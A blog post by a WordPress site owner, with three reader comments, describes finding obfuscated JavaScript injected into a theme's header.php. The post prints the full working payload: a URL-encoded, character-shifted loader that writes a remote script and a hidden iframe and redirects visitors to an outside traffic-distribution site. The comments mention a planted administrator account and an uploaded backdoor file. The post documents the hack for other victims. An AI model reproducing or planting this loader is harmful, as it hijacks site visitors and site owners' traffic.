WordPress Site Hacked With URL Encoded Javascript document.write


If you happened to read my article about my Google AdSense CTR decreasing over the past few months, you may have been wondering why it was dropping so much. Well, I finally started looking into the code of my blog and I found that my site was hacked. The theme's header.php file had some JavaScript injected into it. The following is the code that was found in my header file:

<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

Put this into a URL decoder and you get the following. The first part is the dF() function itself; the second is the argument passed to dF(), which is still obfuscated after one URL-decode because dF() peels off a further layer: it takes the last character of its argument as a key, subtracts that key from every character code, URL-decodes the result again and writes it into the page:

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>


dF('&4Dtdsjqu&4Fepdvnfou/xsjuf&39&33&4Dtdsjqu&31tsd&4E&6D&33&33,&33iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G3&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&33,&33&6D&33&4F&4D&6D0tdsjqu&4F&33&3:&4C&4D0tdsjqu&4F&1B&4Dtdsjqu&4F&1Bjg&39uzqfpg&39i&3:&4E&4E&33voefgjofe&33&3:&8C&1:&1B&1:epdvnfou/xsjuf&39&33&4Djgsbnf&31tsd&4E&38iuuq&4B00jutbmmcsfbltpgu/ofu0uet0jo/dhj&4G4&37tfpsfg&4E&33,fodpefVSJDpnqpofou&39epdvnfou/sfgfssfs&3:,&33&37qbsbnfufs&4E&35lfzxpse&37tf&4E&35tf&37vs&4E2&37IUUQ`SFGFSFS&4E&33,&31fodpefVSJDpnqpofou&39epdvnfou/VSM&3:,&33&37efgbvmu`lfzxpse&4Eopuefgjof&38&31xjeui&4E2&31ifjhiu&4E2&31cpsefs&4E1&31gsbnfcpsefs&4E1&4F&4D0jgsbnf&4F&33&3:&4C&31&1B&8E&1Bfmtf&31jg&39i/joefyPg&39&33iuuq&4B&33&3:&4E&4E1&3:&8C&1B&1:&1:xjoepx/mpdbujpo&4Ei&4C&1B&8E&1B&4D0tdsjqu&4F1')

These bastards put some code into the header of my site that would end up redirecting all of my users after 5-15 seconds. Each time, I'd end up losing the traffic and, in turn, the potential AdSense revenue. I thought that my decreasing Google AdSense CTR was just a sign of the times; turns out otherwise. My ads just weren't being displayed long enough to be seen by my users. If they're only displayed for a few seconds, the chances are they aren't going to be viewed by as many users. I'll be updating everyone on

Has anyone else had their WordPress site hacked like this before? Have you found out how the hackers got into your site?

4 thoughts on “WordPress Site Hacked With URL Encoded Javascript document.write”

  1. The same thing happened to me, except it didn't take 15 seconds to redirect. It was more like right away. It seemed like each time the script would send to another .net site that was all about ads. I did capture two IP addresses: 89.207.130.72 and 208.94.233.33 seemed to show up quite consistently. I am wondering how these jerks got access to my site. There has to be some kind of security hole, because I am the only one that knows my passwords.

    One more thing. My hosting is with HostGator and they reported that they removed the problem file. They reported that this file /2009/09/28788.php had gotten uploaded to my account. One thing they did not check was the associated database entries for WordPress. The hacker added themselves as an administrator to the site. You might not see it in the wp-admin area, but you can look at the user entries in the database. I would suggest removing it ASAP and keep checking to make sure they don't have a backdoor script running.

  2. I’m wondering how they got access too. According to Sam’s comment above, it may have been from a 3rd party ad network. I’m wondering if the Kontera links that I was using were somehow compromised?

    Either way, I lost about $75 in revenue over the 2 days that this was happening. Not cool.

  3. Yeah guys, I am hosted with GoDaddy and I had the same issue. My guess is that it's either a WordPress hole or your passwords, like mine, were not as strong as they should have been. I had a whole slew of "users" that were clearly fakes, and one of them was magically an administrator. I deleted all those accounts, including the administrator one. Then I edited the header.php file and removed that encoded JavaScript junk. I am going to monitor it closely for a few days.

    spicuo.us, what kind of site are you running, getting $30+ a day in ad revenue? Man, I would love to see that kind of income. I am lucky to see around $30 in a two-week span!
